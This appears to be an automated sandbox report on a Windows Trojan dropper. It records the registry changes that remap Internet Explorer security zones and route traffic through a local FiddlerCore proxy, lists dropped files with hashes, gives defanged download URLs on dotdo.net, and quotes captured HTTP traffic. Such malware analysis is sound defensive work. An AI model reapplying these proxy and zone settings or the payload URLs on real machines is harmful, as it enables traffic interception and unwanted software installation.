[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 21 6C 86 C3 29 53 DB 39 20 93 6F 57 F8 DD 0D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process taskkill.exe:1268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 3B DF ED EF 24 72 C5 D8 5C C5 CD EF 03 70 40"
The process taskkill.exe:744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 8B 67 97 EB D0 9B 83 91 E6 6D 82 10 53 84 AD"
The process taskkill.exe:572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 1F D3 D3 F4 24 BF 1F 57 AE B4 D0 6B A9 73 5E"
The process taskkill.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 03 12 83 27 C4 E3 A4 9D 83 00 32 4C 86 5F 7D"
The process taskkill.exe:1200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 25 59 E9 C5 2C D4 6F 0D EF 00 9A 06 37 3D EE"
The process taskkill.exe:1920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 D4 5F 44 BA 78 82 64 22 E7 D1 55 93 10 AD A0"
The process taskkill.exe:1924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 30 F4 6B C9 31 15 64 01 74 63 CE 32 DD F0 BA"
The process taskkill.exe:232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 5D C7 F3 57 4C CE 25 6B 2D FA A7 E2 25 8E 1A"
The process taskkill.exe:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 85 2D 5B 51 55 40 9B 8D 37 16 7D 5A 38 65 ED"
The process taskkill.exe:1776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 F1 0A EA BD DF 0A 06 4F 58 69 51 7E 33 B0 1A"
The process taskkill.exe:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 36 D1 F3 BF 4C 09 D2 0C 74 D5 A2 BA 7B 02 B2"
The process taskkill.exe:1192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 00 C7 23 D1 EB A3 92 6E 5C 54 61 86 41 0E 86"
The process taskkill.exe:1584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C AB DB A6 6E D0 4F 83 99 D0 E4 EA 42 AD 63 28"
The process taskkill.exe:1252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 6C 79 D2 0C 37 ED D2 A2 7B 58 D1 35 40 01 F7"
The process taskkill.exe:1464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 02 B1 12 AE 23 B8 F1 4F C9 5D 40 4D 27 47 00"
The process taskkill.exe:2016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 89 B4 72 8D FA 73 4A 31 80 91 94 46 E1 6B F1"
The process taskkill.exe:1036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 FF 8F 15 FC 92 2F A7 12 5B 63 69 72 A4 9B C9"
The process taskkill.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 FE 7F AA 67 B6 FB 54 25 FF 3F 38 86 CE A6 D4"
The process taskkill.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 FA 07 D2 32 1D 0A 4A 89 8E D5 F9 BE B6 8F E3"
The process taskkill.exe:1216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 90 B6 8E AA 94 FA 91 F3 42 04 02 AB AC F8 F0"
The process taskkill.exe:672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 99 C1 22 AD 98 83 31 54 39 2F CB 1D FE 9F A8"
The process taskkill.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 76 52 40 C4 53 BF FC 1F 09 3A D8 3A 16 6A 04"
The process taskkill.exe:120 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 92 24 EF 84 B3 E8 4D D5 22 44 5D D2 3A 16 D9"
The process taskkill.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 63 16 7E FE 65 62 CF 88 29 04 49 CA 99 AC 86"
The process taskkill.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 2E 9A F6 E1 4F 2E 8F 48 BB C8 CC C8 68 1D CF"
The process taskkill.exe:388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 09 D8 07 35 E1 BD D7 F1 DD 0B 37 67 04 9D D1"
The process taskkill.exe:1020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 33 6C EE 1E 14 AA E1 A2 90 8B 17 F8 3B 47 8F"
The process taskkill.exe:1432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 DB 91 62 BF 33 68 B8 D5 22 ED C0 E2 97 A8 C4"
The process taskkill.exe:1280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 8C AC E4 DB E6 64 CF 1D E9 7B 4E 9E 0B 15 D2"
The process taskkill.exe:1728 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 F2 51 E9 00 76 1D FA A2 71 70 E9 5C 36 B1 EE"
The process taskkill.exe:1384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 60 FD AE 65 A7 72 3C 00 89 EF AA 6D D8 FA 38"
The process taskkill.exe:860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 BC B0 D8 55 ED 3E A7 1C 95 C5 01 FC 76 40 54"
The process taskkill.exe:908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 CA 11 26 09 72 12 24 B5 45 06 0F 30 27 62 A1"
The process taskkill.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 7A 8D 14 33 06 7D BB FD B8 B0 72 C6 29 44 74"
The process taskkill.exe:2020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 2F C8 41 44 3F 95 FF C2 8F 1C A6 D9 AA C7 DE"
The process taskkill.exe:1008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 C3 02 FE 8F EF 87 40 75 6B A9 08 6D F8 70 BC"
The process taskkill.exe:296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 66 74 96 D4 0C 05 F2 DA DB 00 C8 41 C2 A2 6A"
The process taskkill.exe:292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 9C 62 5B 1A 5A C0 BA B5 37 0C 74 B9 A7 EB B5"
The process taskkill.exe:680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 A8 3B AC C6 D2 6F B5 70 BE 64 43 49 E3 26 24"
The process taskkill.exe:1416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE D8 8F C5 31 25 2C 42 AA 46 FA 20 7D 0D 03 49"
The process getcap.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 C6 DC 95 84 7B 63 AD 75 FE 0B 86 40 63 18 D4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process internetport3.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 03 00 00 00 29 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 04 00 00 00 03 00 00 00 29 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877;"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 9D 97 76 20 1A 37 73 3E 91 C7 A1 0E AF 5F 2C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\FiddlerCore\Dynamic]
"Attached" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level"
Dropped PE files
| MD5 | File path |
|---|---|
| a632e8db250976257ee2e73d658ada12 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa10.tmp\System.dll |
| c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa10.tmp\inetc.dll |
| acc2b699edfea5bf5aae45aba3a41e96 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa10.tmp\nsExec.dll |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsaB.tmp\System.dll |
| c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsaB.tmp\inetc.dll |
| acc2b699edfea5bf5aae45aba3a41e96 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsaB.tmp\nsExec.dll |
| 8614c450637267afacad1645e23ba24a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd8.tmp\FindProcDLL.dll |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd8.tmp\System.dll |
| c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd8.tmp\inetc.dll |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsnE.tmp\System.dll |
| 8614c450637267afacad1645e23ba24a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr6.tmp\FindProcDLL.dll |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr6.tmp\System.dll |
| 99f345cf51b6c3c317d20a81acb11012 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsuA.tmp\KillProcDLL.dll |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsuA.tmp\System.dll |
| c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsuA.tmp\inetc.dll |
| 2df723b3cb50a002fca6e8c63a7a487f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\qPAyENSREpdiRdy4l7PC[1].exe |
| a632e8db250976257ee2e73d658ada12 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\vchk[1].exe |
| cb6a1aa1be943fd5aa85bd18708f759b | c:\Program Files\FastInternet\app.exe |
| 29ff2eda9ef60448c67860c675175072 | c:\Program Files\FastInternet\dotuninstall.exe |
| 42badc1d2f03a8b1e4875740d3d49336 | c:\a\7za.exe |
| b19e81fc91a71a7222e63ea4f09771af | c:\a\FiddlerCore.dll |
| da9dbf01355305af60037cd13ccf2968 | c:\a\getcap.exe |
| 2943023b33bb769d64721d4edccbd00b | c:\a\internetport3.exe |
| 2df723b3cb50a002fca6e8c63a7a487f | c:\a\qPAyENSREpdiRdy4l7PC.exe |
| e703835506e5dab34f20b5b496a38f72 | c:\a\wcheckf.exe |
| 813d46d64e42bf222676084e12e2e80d | c:\a\wincheckfe.exe |
| 7988bca8dfaacb79579fd000a31e69cf | c:\a\winonit.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 65536 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 258048 | 2528 | 2560 | 3.12403 | 3333d5ca3c163ed95562eb98d8231779 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 10
6e9a02e45ff743e1e4fadd370e2903eb
aba7046b8baa12b2f0d4c8e67c5ee5dc
870adaabb0d08155f2e2f0d0d5111c82
71cc6609b8db5735ef1d0cf991f0ee49
b8c773eb87a0e41fc08ac983d38eaae0
48423276abbd0ba36915f6c270ce2246
d433981901923cfc7761708c0a8c1bba
c9011de3725d8bff7315a68c4adbad5b
6f36ebfe9bcdb0e9ce78f8200cc42804
2c6ca3869994304875f192b610227269
URLs
| URL | IP |
|---|---|
| hxxp://dotdo.net/cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877 | |
| hxxp://dotdo.net/act/bdcount.ini?uniqueid=qPAyENSREpdiRdy4l7PC&type=1&reg=3215049.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=1 | |
| hxxp://dotdo.net/act/uniqueqPAyENSREpdiRdy4l7PC.ini?rd=1 | |
| hxxp://dotdo.net/act/exesbununique/qPAyENSREpdiRdy4l7PC.exe | |
| hxxp://dotdo.net/ckkk.html | |
| hxxp://dotdo.net/act/txt/uur.txt | |
| hxxp://dotdo.net/act/txt/vv.txt | |
| hxxp://dotdo.net/act/exevc/vchk.exe | |
| hxxp://dotdo.net/act/txt/vchk.txt | |
| hxxp://dotdo.net/ckkkp.html | |
| hxxp://dotap.dotdo.net/act/bdcount.ini?uniqueid=qPAyENSREpdiRdy4l7PC&type=1&reg=3215049.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=1 | |
| hxxp://dotap.dotdo.net/act/txt/vv.txt | |
| hxxp://dotap.dotdo.net/act/uniqueqPAyENSREpdiRdy4l7PC.ini?rd=1 | |
| hxxp://dotap.dotdo.net/act/exesbununique/qPAyENSREpdiRdy4l7PC.exe | |
| hxxp://dotap.dotdo.net/act/txt/vchk.txt | |
| hxxp://dotap.dotdo.net/act/exevc/vchk.exe | |
| hxxp://dotap.dotdo.net/act/txt/uur.txt | |
| fp0.dotdo.net | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET MALWARE Possible Windows executable sent when remote host claims to send html content
Traffic
GET /act/txt/vchk.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:25 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html276b..mpck_gb_26.exe.upmpck_gb_26.exe.LuckyTab.exe.MaxComputerCleaner_
Maintenance.exe.ospd_us_1080.exe.upmbot_gb_571.exe.Setup_product_26943
.exe.SwiftRecord.expext.exe.SwiftRecord.BOASHelper.exe.SwiftRecord.BOA
SPRT.exe.SwiftRecord.BOAS.exe.SwiftRecord.BrowserAdapter.exe.TriplePos
e.expext.exe.TriplePose.BOASHelper.exe.TriplePose.BOASPRT.exe.TriplePo
se.BOAS.exe.TriplePose.BrowserAdapter.exe.FragileFixer.expext.exe.Frag
ileFixer.BOASHelper.exe.FragileFixer.BOASPRT.exe.FragileFixer.BOAS.exe
.FragileFixer.BrowserAdapter.exe.SimpleforYou.expext.exe.SimpleforYou.
BOASHelper.exe.SimpleforYou.BOASPRT.exe.SimpleforYou.BOAS.exe.Simplefo
rYou.BrowserAdapter.exe.Hatchiho.expext.exe.Hatchiho.BOASHelper.exe.Ha
tchiho.BOASPRT.exe.Hatchiho.BOAS.exe.Hatchiho.BrowserAdapter.exe.Mount
ainBike.expext.exe.MountainBike.BOASHelper.exe.MountainBike.BOASPRT.ex
e.MountainBike.BOAS.exe.MountainBike.BrowserAdapter.exe.EduApp.expext.
exe.EduApp.BOASHelper.exe.EduApp.BOASPRT.exe.EduApp.BOAS.exe.EduApp.Br
owserAdapter.exe.innoApp.expext.exe.innoApp.BOASHelper.exe.innoApp.BOA
SPRT.exe.innoApp.BOAS.exe.innoApp.BrowserAdapter.exe.SpecialBox.expext
.exe.SpecialBox.BOASHelper.exe.SpecialBox.BOASPRT.exe.SpecialBox.BOAS.
exe.SpecialBox.BrowserAdapter.exe.BetweenLines.expext.exe.BetweenLines
.BOASHelper.exe.BetweenLines.BOASPRT.exe.BetweenLines.BOAS.exe.Between
Lines.BrowserAdapter.exe.EnhanceTronic.expext.exe.EnhanceTronic.BOASHe
lper.exe.EnhanceTronic.BOASPRT.exe.EnhanceTronic.BOAS.exe.EnhanceTroni
c.BrowserAdapter.exe.MetalMaker.expext.exe.MetalMaker.BOASHelper.e<<< skipped >>>
GET /ckkk.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:21 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT
ETag: "1d6000000029282-91-50a497515eff0"
Accept-Ranges: bytes
Content-Length: 145
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<html>..<head>..<title>Untitled</title>..<
/head>..<body>..</body>..</html>..HTTP/1.1 200 OK
..Date: Sat, 22 Aug 2015 11:00:21 GMT..Server: Apache/2.2.22 (Win64) P
HP/5.3.13..Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT..ETag: "1d6000
000029282-91-50a497515eff0"..Accept-Ranges: bytes..Content-Length: 145
..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type
: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitio
nal//EN">..<html>..<head>..<title>Untitled</ti
tle>..</head>..<body>..</body>..</html>..
font>....
GET /act/txt/uur.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:23 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 2039
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/htmlVVV.download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.h
tml..download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.
html..VVV.filehippo.com/download_malwarebytes_anti_malware..filehippo.
